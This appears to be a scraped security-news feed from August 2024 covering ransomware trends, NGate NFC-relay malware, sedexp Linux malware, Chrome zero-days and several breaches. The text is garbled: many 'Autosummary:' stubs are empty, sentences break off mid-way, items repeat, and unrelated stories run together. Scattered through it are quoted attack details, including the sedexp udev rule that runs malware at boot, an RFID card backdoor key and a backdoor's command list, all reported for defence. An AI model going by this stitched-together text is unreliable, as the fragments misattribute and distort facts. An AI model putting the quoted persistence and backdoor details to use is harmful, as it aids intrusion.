In the most recent campaign, the group targeted organizations in the communications, manufacturing, utility, transportation, construction, maritime, government, information technology, and education sectors.The malware operates directly in memory, it doesn’t modify files on disk to avoid detection “Given the severity of the vulnerability, the sophistication of the threat actors, the critical role of Versa Director servers in the network, and the potential consequences of a successful compromise, Black Lotus Labs considers this exploitation campaign to be highly significant.” concludes the report that includes Indicators of Compromise (IoCs).Analysis of our global telemetry identified actor-controlled small-office/home-office (SOHO) devices exploiting this zero-day vulnerability at four U.S. victims and one non-U.S. victim in the Internet service provider (ISP), managed service provider (MSP) and information technology (IT) sectors as early as June 12, 2024.” "Nuclei is a fast and customizable open-source vulnerability scanner powered by YAML-based templates. With its flexible templating system, Nuclei can be adapted to perform various security checks. It can send requests to multiple targets using customizable templates, ensuring zero false positives and enabling rapid scanning across many hosts. It supports a wide range of protocols, including TCP, DNS, HTTP, SSL, File, Whois, Websocket, and more. Nuclei features Template library: A collection of community-powered templates for … More
The post Nuclei: Open-source vulnerability scanner appeared first on Help Net Security.
"Autosummary:
It supports a wide range of protocols, including TCP, DNS, HTTP, SSL, File, Whois, Websocket, and more.Target specification: Support for various target specification options, such as URLs, IP ranges, ASN ranges, and file input, allowing flexibility in defining the scanning scope. "Changes witnessed over the last few years have led to larger ransomware groups breaking into smaller units, posing more considerable challenges for law enforcement. Ransomware actors are evading arrest more easily and adapting methods with innovative technologies. In this Help Net Security video, Shobhit Gautam, Security Solutions Architect at HackerOne, discusses how ransomware tactics have evolved and how organizations and government bodies are having to fight change with change.
The post Rebrand, regroup, ransomware, repeat appeared first on Help Net Security.
"Autosummary:
"Autosummary:
NGate, besides abusing the functionality of NFCGate to capture NFC traffic and pass it along to another device, prompts users to enter sensitive financial information, including banking client ID, date of birth, and the PIN code for their banking card. "Autosummary:
Linux malware sedexp uses udev rules for persistence and evasion Pierluigi Paganini August 26, 2024 August 26, 2024 Researchers spotted a new stealthy Linux malware named sedexp that uses Linux udev rules to achieve persistence and evade detection. "Autosummary:
Since the security of the networks in which a company’s endpoints connects to is no longer under your organization’s control, the emphasis must shift to controlling and securing the devices directly: Limit inbound network traffic Reduce shadow IT to zero Secure data storage and transportation Maintain visibility of what occurs in your environment Enforce secure access to accounts The IT Professional’s Guide to Securing Remote Workforces ThreatLocker® has built a list of the top 15 actions you can take to secure your organization if you employ a remote or hybrid workforce. "Autosummary:
On Saturday, August 24, the Port of Seattle warned that it and the SEA Airport were suffering an ongoing outage caused by a "possible cyberattack," forcing them to isolate certain critical systems to contain the damage. "Autosummary:
Show notes and credits: Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com) Licensed under Creative Commons: By Attribution 4.0 License http://creativecommons.org/licenses/by/4.0/ Outro Music: “Good God” by Wowa (unminus.com) Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it. "Autosummary:
"Autosummary:
"Autosummary:
" Tracked under EX873252, this ongoing service degradation issue seems to be widespread, according to reports from system administrators, and it also impacts messages with image signatures. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
(March 2024) CVE-2024-4671 : a use-after-free issue that resides in the Visuals component (May 2024).Google addressed the tenth actively exploited Chrome zero-day this year Pierluigi Paganini August 26, 2024 August 26, 2024 Google released emergency security updates to fix the tenth actively exploited Chrome zero-day vulnerability this year. "Autosummary:
A cyberattack impacted operations at the Port of Seattle and Sea-Tac Airport Pierluigi Paganini August 26, 2024 August 26, 2024 A cyber attack hit the Port of Seattle, which also operates the Seattle-Tacoma International Airport, websites and phone systems were impacted. In response to the incident, the Port isolated critical systems The Port of Seattle, including SEA Airport, is experiencing an internet and web systems outage, which is impacting some systems at the airport. "Autosummary:
" The udev rule for sedexp -- ACTION=="add", ENV{MAJOR}=="1", ENV{MINOR}=="8", RUN+="asedexpb run:+" -- is set up such that the malware is run whenever /dev/random (corresponds to device minor number 8) is loaded, which typically occurs upon every reboot. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: PostgreSQL databases under attack Poorly protected PostgreSQL databases running on Linux machines are being compromised by cryptojacking attackers. Vulnerabilities in Microsoft macOS apps may give attackers access to microphone, camera Vulnerabilities in popular Microsoft apps for macOS can be abused by attackers to record video and audio clips, take pictures, access and exfiltrate data and send emails, Cisco Talos researchers … More
The post Week in review: PostgreSQL databases under attack, new Chrome zero-day actively exploited appeared first on Help Net Security.
"Autosummary:
New infosec products of the week: August 23, 2024 Here’s a look at the most interesting products from the past week, featuring releases from Entrust, Fortanix, McAfee, Own, RightCrowd, and Wallarm. Another critical SolarWinds Web Help Desk bug fixed (CVE-2024-28987) A week after SolarWinds released a fix for a critical code-injection-to-RCE vulnerability (CVE-2024-28986) in Web Help Desk (WHD), another patch for another critical flaw (CVE-2024-28987) in the company’s IT help desk solution has been pushed out. "Autosummary:
"Autosummary:
"Autosummary:
Russian national arrested in Argentina for laundering money of crooks and Lazarus APT Pierluigi Paganini August 24, 2024 August 24, 2024 A Russian national was arrested in Argentina for laundering proceeds from illicit actors, including North Korea-linked Lazarus Group.Through our investigation, we were able to confirm that the Lazarus Group and APT38, cyber actors associated with the DPRK, are responsible for the theft of $100 million of virtual currency from Harmony’s Horizon bridge reported on June 24, 2022.” "Autosummary:
"Autosummary:
Udev rules are text configuration files that dictate how the manager should handle certain devices or events, located in "/etc/udev/rules.d/" or "/lib/udev/rules.d/." These rules contain three parameters that specify its applicability (ACTION== "add"), the device name (KERNEL== "sdb1"), and what script to run when the specified conditions are met (RUN+="/path/to/script"). "Autosummary:
"To date, most technology solutions focused on vulnerability management have focused on the prioritization of risks. That usually took the shape of some risk-ranking structure displayed in a table with links out to the CVEs and other advisory or threat intelligence information. This is a necessary step, but it’s insufficient. While knowing which vulnerabilities are the most pressing is nice, the desired outcome is ensuring those vulnerabilities are addressed and mitigated as quickly as possible. … More
The post Vulnerability prioritization is only the beginning appeared first on Help Net Security.
"Autosummary:
Specifically in vulnerability management using a vulnerability scanner such as Wiz, a code repo like GitHub or GitLab, and a ticketing system like ServiceNow or Jira, mapping can clarify when a vulnerability is marked high priority, when a ticket is created, who owns the ticket, what activity is taken to resolve the ticket in GitHub (or in the CI/CD), and when the ticket is closed and by whom. Why the security journey is so opaque Most CISOs and their teams have clear metrics to assess progress on handling vulnerabilities, such as mean-time-to-detect, mean-time-to-response, percentage of critical vulnerabilities unpatched, time to patch, and more. "In the first six months of 2024, Hiya flagged nearly 20 billion calls as suspected spam – more than 107 million spam calls everyday. The data showed spam flag rates of more than 20% of unknown calls (calls coming from outside of someone’s address book) in 25 out of the 42 countries – with some spam flag rates above 50%. The first half of 2024 also saw an increase in AI deepfake scams, which use … More
The post Fraud tactics and the growing prevalence of AI scams appeared first on Help Net Security.
"Autosummary:
The rate of spam flag rate varies state by state, with Oklahoma, Indiana, and Ohio having the highest spam rates in H1, while Alaska, New York, and North Dakota had the lowest. "After peaking in late 2023, the ransomware industry is beginning to stabilize in productivity, with notable developments in ransomware targets, and industry dynamics, according to WithSecure. Sectors impacted by ransomware (Source: WithSecure) While ransomware productivity has shown signs of leveling off in 2024, the frequency of attacks and ransom payments collected remained higher in the first half of 2024 than in 2022 and 2023. “There has been a marked shift towards targeting small and medium-sized … More
The post The changing dynamics of ransomware as law enforcement strikes appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Users who end up launching the unsigned file after explicitly allowing it to be run – i.e., bypassing Gatekeeper protections – are prompted to enter their system password, an osascript-based technique that has been adopted by Atomic Stealer, Cuckoo, MacStealer, and Banshee Stealer. "Autosummary:
These include browser cookies, which can give attackers access to user sessions and stored passwords, and numerous cryptocurrency wallets such as Coinbase, MetaMask, Wasabi, Binance, Daedalus, Electrum, Atomic, Harmony, Enjin, Hoo, Dapper, Coinomi, Trust, Blockchain, and XDeFI wallets highlighting the malware’s focus on exploiting financial data. "Autosummary:
“ The vulnerability impacts the following devices: MDS 9000 Series Multilayer Switches (CSCwj97007) Nexus 3000 Series Switches (CSCwj97009) Nexus 5500 Platform Switches (CSCwj97011) Nexus 5600 Platform Switches (CSCwj97011) Nexus 6000 Series Switches (CSCwj97011) Nexus 7000 Series Switches (CSCwj94682) * Nexus 9000 Series Switches in standalone NX-OS mode (CSCwj97009) Cisco recommends customers monitor the use of credentials for the administrative users network-admin and vdc-admin.China-linked APT Velvet Ant exploited zero-day to compromise Cisco switches Pierluigi Paganini August 23, 2024 August 23, 2024 China-linked APT group Velvet Ant exploited a recently disclosed zero-day in Cisco switches to take over the network appliance. "A week after SolarWinds released a fix for a critical code-injection-to-RCE vulnerability (CVE-2024-28986) in Web Help Desk (WHD), another patch for another critical flaw (CVE-2024-28987) in the company’s IT help desk solution has been pushed out. CVE-2024-28987 CVE-2024-28987 stems from Web Help Desk having hardcoded credentials that can be misused by remote unauthenticated users to access internal functionality and modify data. The vulnerability was reported by Horizon3.ai vulnerability researcher Zach Hanley, after after digging into … More
The post Another critical SolarWinds Web Help Desk bug fixed (CVE-2024-28987) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Here"s what you"ll witness: Simulating real-world threats : Watch how the platform detects, investigates, and neutralizes attacks in real-time. "Autosummary:
Indeed, Coveware said over 10% of the incidents handled by the company in Q2 2024 were unaffiliated, meaning they were "attributed to attackers that were deliberately operating independently of a specific brand and what we typically term "lone wolves."" "Continued takedowns of cybercriminal forums and marketplaces shortened the lifecycle of criminal sites, as the site administrators try to avoid drawing law enforcement (LE) attention," Europol said in an assessment released last month. "Once the attacker reached the domain controller in question, they edited the default domain policy to introduce a logon-based Group Policy Object (GPO) containing two items," researchers Lee Kirkpatrick, Paul Jacobs, Harshal Gosalia, and Robert Weiland said. "Autosummary:
"On August 21, 2024, Halliburton Company (the "Company") became aware that an unauthorized third party gained access to certain of its systems," the oil services giant said in a filing with the U.S. Securities and Exchange Commission (SEC). "Autosummary:
"Autosummary:
" Linux boot broken after Windows security update (Ok_Work_5257) For those who have already installed the August 2024 Windows updates and can no longer boot Linux on their dual-boot devices, Microsoft recommends deleting the SBAT update and ensuring that future SBAT updates will no longer be installed. "Autosummary:
Associated domains Fake streaming sites: Qtvlivestreamhd[.]com Hqonlivestream[.]xyz Visitpageaus[.]com Auseventstream[.]com Phishing sites: pbg4jptrk[.]com paperpadpen[.]com The National Association of Funeral Directors says: “You shouldn’t have to pay to view a funeral live stream and official links will be provided via the funeral director to the bereaved family.” Malwarebytes blocks pbg4jptrk.com Adding the domain to the exclusion list allowed me to follow through, and I ended up on a site that wants you to sign up for your “favorite movies” so that I could allegedly get full access. "Autosummary:
Qilin ransomware steals credentials stored in Google Chrome Pierluigi Paganini August 23, 2024 August 23, 2024 Sophos researchers investigated a Qilin ransomware breach attack that led to the theft of credentials stored in Google Chrome browsers. "Autosummary:
Phishing attacks target mobile users via progressive web applications (PWA) Pierluigi Paganini August 23, 2024 August 23, 2024 Cybercriminals use progressive web applications (PWA) to impersonate banking apps and steal credentials from mobile users. For Android users, this can be a WebAPK, while for both iOS and Android users, it may be a Progressive Web Application (PWA). "Autosummary:
"The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Defense Cyber Crime Center (DC3) are releasing this joint Cybersecurity Advisory (CSA) to warn network defenders that, as of August 2024, a group of Iran-based cyber actors continues to exploit U.S. and foreign organizations. This includes organizations across several sectors in the U.S. (including in the education, finance, healthcare, and defense sectors as well as local government entities) and other countries (including in Israel, Azerbaijan, and the United Arab Emirates). The FBI assesses a significant percentage of these threat actors’ operations against US organizations are intended to obtain and develop network access to then collaborate with ransomware affiliate actors to deploy ransomware. The FBI further assesses these Iran-based cyber actors are associated with the Government of Iran (GOI) and—separate from the ransomware activity—conduct computer network exploitation activity in support of the GOI (such as intrusions enabling the theft of sensitive technical data against organizations in Israel and Azerbaijan).
This CSA provides the threat actor’s tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs), as well as highlights similar activity from a previous advisory (Iran-Based Threat Actor Exploits VPN Vulnerabilities) that the FBI and CISA published on Sept. 15, 2020. The information and guidance in this advisory are derived from FBI investigative activity and technical analysis of this group’s intrusion activity against U.S. organizations and engagements with numerous entities impacted by this malicious activity.
The FBI recommends all organizations follow guidance provided in the Mitigations section of this advisory to defend against the Iranian cyber actors’ activity.
If organizations belie "
Autosummary:
The actors’ initial access is usually obtained via exploiting a public-facing networking device, such as Citrix Netscaler (CVE-2019-19781 and CVE-2023-3519), F5 BIG-IP (CVE-2022-1388), Pulse Secure/Ivanti VPNs (CVE-2024-21887), and, more recently, PanOS firewalls (CVE-2024-3400) Exfiltration and Impact After infiltrating victim networks, the actors collaborate with ransomware affiliates (including NoEscape, Ransomhouse, and ALPHV [aka BlackCat]) in exchange for a percentage of the ransom payments by providing affiliates with access to victim networks, locking victim networks, and strategizing to extort victims [T1657].Summary The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Defense Cyber Crime Center (DC3) are releasing this joint Cybersecurity Advisory (CSA) to warn network defenders that, as of August 2024, a group of Iran-based cyber actors continues to exploit U.S. and foreign organizations. This CSA provides the threat actor’s tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs), as well as highlights similar activity from a previous advisory (Iran-Based Threat Actor Exploits VPN Vulnerabilities) that the FBI and CISA published on Sept. 15, 2020.This includes organizations across several sectors in the U.S. (including in the education, finance, healthcare, and defense sectors as well as local government entities) and other countries (including in Israel, Azerbaijan, and the United Arab Emirates). Execution, Privilege Escalation, and Defense Evasion Repurpose compromised credentials from exploiting networking devices, such as Citrix Netscaler, to log into other applications (i.e., Citrix XenDesktop) "There’s been an alarming increase in ransomware attacks over the past year, alongside significant shifts in the tactics and strategies employed by cybercriminals that underscore the necessity for organizations to implement around-the-clock monitoring and investigation of suspicious behaviors, according to a new Malwarebytes report. “Ransomware gangs have time and motivation on their side. They constantly evolve to respond to the latest technologies chasing at their tails,” said Marcin Kleczynski, CEO, Malwarebytes. “We’ve seen this distinctly … More
The post Most ransomware attacks occur between 1 a.m. and 5 a.m. appeared first on Help Net Security.
"Autosummary:
There’s been an alarming increase in ransomware attacks over the past year, alongside significant shifts in the tactics and strategies employed by cybercriminals that underscore the necessity for organizations to implement around-the-clock monitoring and investigation of suspicious behaviors, according to a new Malwarebytes report. "Autosummary:
"Autosummary:
"ESET researchers uncovered NGate malware, which can relay data from victims’ payment cards via a malicious app installed on their Android devices to the attacker’s rooted Android phone. Attack overview (Source: ESET) Unauthorized ATM withdrawals The campaign’s primary goal in targeting banks was facilitating unauthorized ATM withdrawals from the victims’ bank accounts. This was achieved by relaying NFC data from the victims’ physical payment cards via their compromised Android smartphones using the NGate Android malware … More
The post Android malware uses NFC to steal money at ATMs appeared first on Help Net Security.
"Autosummary:
The technique is based on a tool called NFCGate, designed by students at the Technical University of Darmstadt, Germany, to capture, analyze, or alter NFC traffic; therefore, we named this new malware family NGate,” says Lukáš Štefanko, who discovered the novel threat and technique.This means checking URLs of websites, downloading apps from official stores, keeping PIN codes secret, using security apps on smartphones, turning off the NFC function when it is not needed, using protective cases, or using virtual cards protected by authentication,” advises Štefanko. "A new Chrome zero-day vulnerability (CVE-2024-7971) exploited by attackers in the wild has been fixed by Google. About CVE-2024-7971 CVE-2024-7971 is a high-severity vulnerability caused by a type confusion weakness in V8, the open-source JavaScript and WebAssembly engine developed by Google for the Chromium and Google Chrome web browsers. “In languages without memory safety, such as C and C++, type confusion can lead to out-of-bounds memory access,” Mitre explains the problem. (V8 is written in … More
The post New Chrome zero-day actively exploited, patch quickly! (CVE-2024-7971) appeared first on Help Net Security.
"Autosummary:
About CVE-2024-7971 CVE-2024-7971 is a high-severity vulnerability caused by a type confusion weakness in V8, the open-source JavaScript and WebAssembly engine developed by Google for the Chromium and Google Chrome web browsers. "Autosummary:
How CASPT is Applied Across Different Assets Continuous Attack Surface Penetration Testing can be applied across a variety of digital assets, including: Web Applications: Continuous testing of web applications helps in identifying vulnerabilities like SQL injection, cross-site scripting (XSS), and broken authentication mechanisms. The benefits of integrating CASPT with other offensive security tools like ASM and red teaming are significant including a reduced attack surface, increased resilience to withstand real-world attacks, cost-efficiencies from reduced breaches and operational downtime, and meeting regulatory requirements by providing ongoing evidence of security practices and vulnerabilities management.High-Value Targets Scenario: Organizations that are considered high-value targets for cyberattacks, such as those in finance, healthcare, government, or technology sectors.Regulatory and Compliance Requirements Scenario: Industries with strict compliance standards, such as finance, healthcare, or critical infrastructure, where maintaining high levels of security is mandatory. Continuous Penetration Testing or Continuous Attack Surface Penetration Testing (CASPT) is an advanced security practice that involves the continuous, automated, and ongoing penetration testing services of an organization"s digital assets to identify and mitigate security vulnerabilities.Unlike traditional penetration testing, which is often performed annually or semi-annually, CASPT is an ongoing process that integrates directly into the software development lifecycle (SDLC), ensuring that vulnerabilities are discovered and addressed in real-time or near-real-time.By adopting a proactive, continuous approach to penetration testing, organizations can stay ahead of emerging threats, improve their security development cycle, and protect their most valuable assets. Attack Path Validation and Mapping More innovative CASPT providers offer organizations with continuous validation of their attack paths by with an automatic visualization that maps out all potential routes an attacker might take to compromise critical assets from domain, subdomains, IP addresses, and discovered vulnerabilities. What Continuous Attack Surface Penetration Testing is Not While CASPT shares similarities with traditional penetration testing, there are distinct differences: Not a One-Time Assessment: Traditional penetration testing is typically a one-time assessment conducted periodically. "Autosummary:
"Autosummary:
After the update, the version should be 128.0.6613.84/85, or later Besides the zero-day, this update contains 37 other security fixes, as well as Google Lens for desktop. "QNAP has released the QTS 5.2 NAS operating system. A standout feature of this release is the debut of Security Center, which actively monitors file activities and thwarts ransomware threats. Additionally, system security receives a boost with the inclusion of support for TCG-Ruby self-encrypting drives (SED). Extensive optimizations have been implemented to streamline operations, configuration, and management processes, significantly elevating the overall user experience. “We greatly appreciate the invaluable feedback provided by our dedicated QTS … More
The post QNAP releases QTS 5.2 to prevent data loss from ransomware threats appeared first on Help Net Security.
"Autosummary:
“We greatly appreciate the invaluable feedback provided by our dedicated QTS 5.2 beta testers, which has been instrumental in putting the finishing touches on this official release,” said Tim Lin, Product Manager of QNAP, adding “QNAP remains committed to ensuring our data storage and management solutions stay current, offering dependable NAS storage solutions that meet the heightened expectations of today’s users.” "Autosummary:
"Autosummary:
"If you didn"t lock down your Exchange Online organization to accept mail only from your third-party service, or if you didn"t enable enhanced filtering for connectors, anyone could send an email to you through ourcompany.protection.outlook.com or ourcompany.mail.protection.outlook.com, and DMARC (SPF and DKIM) verification will be skipped," the company said. "Autosummary:
Its wafer fabs are located in Tempe, Arizona, Gresham, Oregon, and Colorado Springs, Colorado. "Autosummary:
(March 2024) CVE-2024-4671 : a use-after-free issue that resides in the Visuals component (May 2024).Google addressed the ninth actively exploited Chrome zero-day this year Pierluigi Paganini August 22, 2024 August 22, 2024 Google released emergency security updates to fix the ninth actively exploited Chrome zero-day vulnerability this year. "Autosummary:
Stealing card data via NFC chip The attacks start with malicious texts, automated calls with pre-recorded messages, or malvertising to trick victims into installing a malicious PWA, and later WebAPKs, on their devices. "Autosummary:
"Autosummary:
Such extensive credential theft could enable follow-up attacks, lead to widespread breaches across multiple platforms and services, make response efforts a lot more cumbersome, and introduce a lingering, long-lasting threat after the ransomware incident is resolved. "Autosummary:
A cyberattack hit US oil giant Halliburton Pierluigi Paganini August 22, 2024 August 22, 2024 US oil giant Halliburton announced that it was hit by a cyberattack that is affecting operations at its Houston, Texas offices. "Autosummary:
The list of affected models is very long, it includes IPC-X3XXX,HX5XXX, HUM7XX, VTO75X95X, VTO65XXX, VTH542XH, PTZ Dome Camera SD1A1, SD22, SD49, SD50, SD52C, SD6AL, Thermal TPC-BF1241, TPC-BF2221, TPC-SD2221, TPC-BF5XXX, TPC-SD8X21, TPC-PT8X21B, NVR1XXX, NVR2XXX, NVR4XXX, NVR5XXX, NVR6XX. "Autosummary:
"Autosummary:
From the samples analyzed, we were able to identify five distinct phishing websites, namely: rb.2f1c0b7d.tbc-app[.]life geo-4bfa49b2.tbc-app[.]life rb-62d3a.tbc-app[.]life csob-93ef49e7a.tbc-app[.]life george.tbc-app[.]life The icon and name of each sample has been designed to mimic specific targeted banking apps, further enhancing their deceptive appearance.The technique is based on a tool called NFCGate, designed by students at the Technical University of Darmstadt, Germany, to capture, analyze, or alter NFC traffic; therefore, we named this new malware family NGate. This scenario, however, is generally limited to making small contactless payments at terminal points, depending on the limit set by the bank that issued the card, not for ATM withdrawals, as the latter would require the attacker to have the card’s PIN. During our testing, we successfully relayed the UID from a MIFARE Classic 1K tag, which is typically used for public transport tickets, ID badges, membership or student cards, and similar use cases.Before transitioning to the new malware, which we named NGate, to relay NFC traffic, the attackers formerly used PWA, then WebAPKs, to steal the banking credentials of their victims.This means that a user, whether on a desktop computer, laptop, tablet, or smartphone, can access the same PWA without needing to download a separate app for each device.The malware used, which we have named NGate, has the unique ability to relay data from victims’ payment cards, via a malicious app installed on their Android devices, to the attacker’s rooted Android phone. Conclusion ESET researchers have investigated a novel and unique attack scenario that combines well-known methods, such as phishing, with a new malware technique of relaying NFC traffic from victims’ physical payment cards to the attackers’ Android mobile device.This technique could be employed by an attacker attempting to read cards through unattended purses, wallets, backpacks, or smartphone cases that hold cards, particularly in public and crowded places.Using NFCGate, it’s possible to perform an NFC relay attack to read an NFC token in one location and, in real time, access premises in a different location by emulating its UID, as shown in Figure 7.Example of a PWA icon (left) and that of the app it is mimicking (right) PWAs are essentially a type of app, but unlike traditional apps that are downloaded and installed from an app store, PWAs are accessed and used directly within a web browser. However, NGate also prompts its victims to enter sensitive information like their banking client ID, date of birth, and the PIN code for their banking card.They are built using common web programming languages such as HTML (for structure), CSS (for design), and JavaScript (for interactivity), which are the same technologies used to create websites.On Android, supported browsers include Chrome, Firefox, Edge, and Opera. Technical analysis of NGate malware Initial access Initial access to the device is gained by deceiving the victim into installing a malicious app, often under the guise of a false assertion that there is an overpayment of income tax that the victim can reclaim. "Associate Cybersecurity Operations Officer UNICC | USA | On-site – View job details The Center aims to provide trusted ICT services and digital business solutions. You will work under the direct supervision and guidance of the Head of Cybersecurity Operations within the Cybersecurity Division and in close collaboration with the CSO teams. Cybersecurity Engineer, Compliance Electrolux | Italy | Hybrid – View job details You’ll leverage your expertise to guide digital product teams and facilitate … More
The post Cybersecurity jobs available right now: August 21, 2024 appeared first on Help Net Security.
"Autosummary:
Cyber Risk Specialist – Compliance Bayer | Poland | Hybrid – View job details The Cyber Risk Specialist—Compliance supervises, delegates, and assists in developing and implementing compliance monitoring methodologies and programs to proactively identify, report, and remediate all compliance risks. Security Researcher Hunters | Israel | Hybrid – View job details Hunters are looking for a top-notch security researcher, to resolve the toughest issue in cybersecurity: utilizing terabytes of data for detecting attacks, incident investigation, and prioritizing threats. "McAfee launched McAfee Deepfake Detector, the latest addition to the company’s suite of AI-powered products. With AI-created videos, or deepfakes, flooding the internet and circulating across social media, we now live in a world where seeing and hearing are no longer believing. To combat the rise in AI scams and misinformation, McAfee is working with Lenovo to bring powerful AI-based deepfake detection capabilities to customers purchasing select Lenovo AI PCs, starting today. To help educate … More
The post McAfee Deepfake Detector combats AI scams and misinformation appeared first on Help Net Security.
"Autosummary:
Availability and pricing McAfee Deepfake Detector is available for English language detection in select new Lenovo AI PCs3, ordered on Lenovo.com and select local retailers beginning August 21, 2024, in the US, UK, and Australia. "Autosummary:
"Autosummary:
An arbitrary file read flaw in the BookingPress appointment booking plugin that allows authenticated attackers, with Subscriber-level access and above, to create arbitrary files and execute arbitrary code or access sensitive information CVE-2024-5441 (CVSS score: 8.8) - "Autosummary:
A backdoor in millions of Shanghai Fudan Microelectronics RFID cards allows cloning Pierluigi Paganini August 21, 2024 August 21, 2024 A flaw in millions of RFID cards manufactured by Shanghai Fudan Microelectronics allows these contactless cards to be cloned instantly. A396EFA4E24F (Listing 9: FM11RF08S universal backdoor key) “Tests show that once authenticated, we can read all user blocks, even if the trailer block access rights indicate that data blocks are not readable. "Autosummary:
"American semiconductor manufacturer Microchip Technology Incorporated has had some of its business operations disrupted by a cyberattack. “As a result of the incident, certain of the Company’s manufacturing facilities are operating at less than normal levels, and the Company’s ability to fulfill orders is currently impacted,” the company revealed in a SEC filing on Tuesday. What is known about the cyberattack? Microchip Technology detected potentially suspicious activity involving its IT systems on August 17, 2024. … More
The post Microchip Technology manufacturing facilities impacted by cyberattack appeared first on Help Net Security.
"Autosummary:
Its products are used by companies in a variety of industries, including automotive, communications, computing, medical, aerospace and defense. "Autosummary:
"The DPRK, via units like the Lazarus Group, continues to target crypto-industry businesses with the goal of stealing cryptocurrency in order to circumvent international sanctions that hinder the growth of their economy and ambitions," Elastic said at the time. "Autosummary:
“The PowerShell code is designed to download components of the SPECTR malware (which steals documents, screenshots, browser data, etc.) and a new program called FIRMACHAGENT (“chrome_updater.dll,” primarily tasked with uploading stolen data to a command server).” "Autosummary:
"Autosummary:
Successful exploitation enables any unauthenticated visitors to gain administrator-level access, which can be used to completely take over websites running vulnerable LiteSpeed Cache versions by installing malicious plugins, changing critical settings, redirecting traffic to malicious websites, distributing malware to visitors, or stealing user data. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
The malicious WebAPK (left) and the phishing login page (right) Source: ESET The appeal of using PWAs on mobile PWAs are designed to work across multiple platforms, so attackers can target a broader audience through a single phishing campaign and payload. "Autosummary:
"Autosummary:
"Autosummary:
The flaw was discovered by Gen Digital researchers, who say that the Lazarus hacking group exploited the AFD.sys flaw as a zero-day to install the FUDModule rootkit, used to evade detection by turning off Windows monitoring features. "The risk of deepfakes is rising with 47% of organizations having encountered a deepfake and 70% of them believing deepfake attacks which are created using generative AI tools, will have a high impact on their organizations, according to iProov. Perceptions of AI are hopeful as 68% of organizations believe that while it’s impactful at creating cybersecurity threats, 84% find it’s instrumental in protecting against them. This is according to a new global survey of technology … More
The post Organizations turn to biometrics to counter deepfakes appeared first on Help Net Security.
"Autosummary:
Unsurprisingly, deepfakes are now tied for third place amongst the most prevalent concerns for survey respondents with the following order: password breaches (64%), ransomware (63%), phishing/social engineering attacks (61%), and deepfakes (61%) .APAC (81%), European (72%), and North American (71%) organizations are significantly more likely than LATAM organizations (54%) to believe deepfake attacks will have an impact on their organization. "Threat actors use popular file-hosting or e-signature solutions as a disguise to manipulate their targets into revealing private information or downloading malware, according to Abnormal Security. A file-sharing phishing attack is a unique type of phishing threat in which a cybercriminal poses as a known colleague or familiar file-hosting or e-signature solution and sends a target a malicious email containing a link to what appears to be a shared file or document. Should the recipient … More
The post Cybercriminals exploit file sharing services to advance phishing attacks appeared first on Help Net Security.
"Autosummary:
The majority of these attacks were sophisticated in nature, with 60% exploiting legitimate domains, most commonly webmail accounts, such as Gmail, iCloud, and Outlook; productivity and collaboration platforms; file storage and sharing platforms like Dropbox; and e-signature solutions like Docusign. "Culture is a catalyst for security success. It can significantly reduce cybersecurity risks and boost cybersecurity resilience of any organization. Culture can also greatly enhance the perceived value, relevance and reputation of the cybersecurity function. So how can security leaders develop a positive brand and culture for cybersecurity? Listed below are some recommendations and best practices: 1. Understand the prevailing culture and context To understand why the workforce behaves in a certain way about technology … More
The post Strategies for security leaders: Building a positive cybersecurity culture appeared first on Help Net Security.
"Autosummary:
For example, any regional cultural differences, the particular industry sector, the underlying company structure, the lack of awareness and knowledge of security norms, and conflicting business priorities, can all weigh on any planned change to team culture and security behaviors. 3. Set clear goals and aspirations As part of the design blueprint for security culture change, the security leader should set clear aspirations for what the team is trying to achieve, underpinned by conversations about how the culture underscores the effectiveness of the team, and the importance of making the change. "Autosummary:
The suspected Spanish-speaking group is known for using spear-phishing lures to distribute various publicly available remote access trojans such as AsyncRAT, BitRAT, Lime RAT, NjRAT, Quasar RAT, and Remcos RAT. "Autosummary:
"Autosummary:
“Contents: Everything like Contacts, Finance, Customers, Schemes, Employees, Photos, DBs, Network infrastructure, Emails, and a lot of perfect data.Toyota disclosed a data breach after ZeroSevenGroup leaked stolen data on on a cybercrime forum Pierluigi Paganini August 20, 2024 August 20, 2024 Toyota has confirmed a data breach after a threat actor leaked 240GB of data stolen from its infrastructure on a cybercrime forum. "GuidePoint Security has launched a new Phishing as a Service (PhaaS) offering. Phishing remains one of the most common entry points for threat actors – according to CISA, over 90% of successful cyberattacks start with a phishing email. However, managing simulation platforms and crafting convincing, efficient campaigns takes time and energy that many security teams lack. By putting phishing simulation tools into the hands of experienced Attack Simulation Operators, GuidePoint Security’s new Phishing as a … More
The post GuidePoint Security releases Phishing as a Service appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The commands supported by Msupedge are listed below - 0x8a: Create a process using a command received via a DNS TXT record 0x75: Download file using a download URL received via a DNS TXT record 0x24: Sleep for a predetermined time interval 0x66: Sleep for a predetermined time interval 0x38: Create a temporary file "%temp%\1e5bf625-1678-zzcv-90b1-199aa47c345.tmp" who"s purpose is unknown 0x3c: "Autosummary:
" Some of its important functions include conducting system reconnaissance, taking screenshots, downloading remote files, and uploading sensitive data over FTP and Dropbox. "TA453 phishing campaigns [...] have consistently reflected IRGC intelligence priorities," Proofpoint researcher Joshua Miller said in a statement shared with The Hacker News. Enterprise security company Proofpoint is tracking the activity under the name TA453, which overlaps with activity tracked by the broader cybersecurity community under the monikers APT42 (Mandiant), Charming Kitten (CrowdStrike), Damselfly (Symantec), Mint Sandstorm (Microsoft), and Yellow Garuda (PwC). "Autosummary:
“Contents: Everything like Contacts, Finance, Customers, Schemes, Employees, Photos, DBs, Network infrastructure, Emails, and a lot of perfect data.Toyota disclosed a data breach after ZeroSevenGroup leaked stolen data on a cybercrime forum Pierluigi Paganini August 20, 2024 August 20, 2024 Toyota has confirmed a data breach after a threat actor leaked 240GB of data stolen from its infrastructure on a cybercrime forum. "Autosummary:
